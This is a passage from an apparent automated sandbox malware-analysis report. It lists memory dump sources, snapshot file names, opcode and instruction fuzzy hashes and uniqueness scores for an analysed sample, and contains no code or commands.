                  • Opcode Fuzzy Hash: 318f6b796f01cf35662c89d64c5f96a474140fd50567755ddf63184cb878c880
                  • Instruction Fuzzy Hash: A6F0903180D68D8FEB5AAF6488291B97BA0FF56241F4405BEE809C61D2EB789454C711
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6b1d46799641717efa66dbe4d64564a8256e1ea1f2e36bcd3d201b6d25f46083
                  • Instruction ID: d0367ee3868ed4c4788ac42d756a76e5e62c7195c822d9705fb74dd24c6b9edf
                  • Opcode Fuzzy Hash: 6b1d46799641717efa66dbe4d64564a8256e1ea1f2e36bcd3d201b6d25f46083
                  • Instruction Fuzzy Hash: 86F0963080E7C98FEB5AAF6488691B97FA1FF16205F4505BFD409C60D3EB389558C711
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0a000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: %$-$-$/
                  • API String ID: 0-3766047989
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: #$'$/${
                  • API String ID: 0-2795190509
                  Uniqueness

                  Uniqueness Score: -1.00%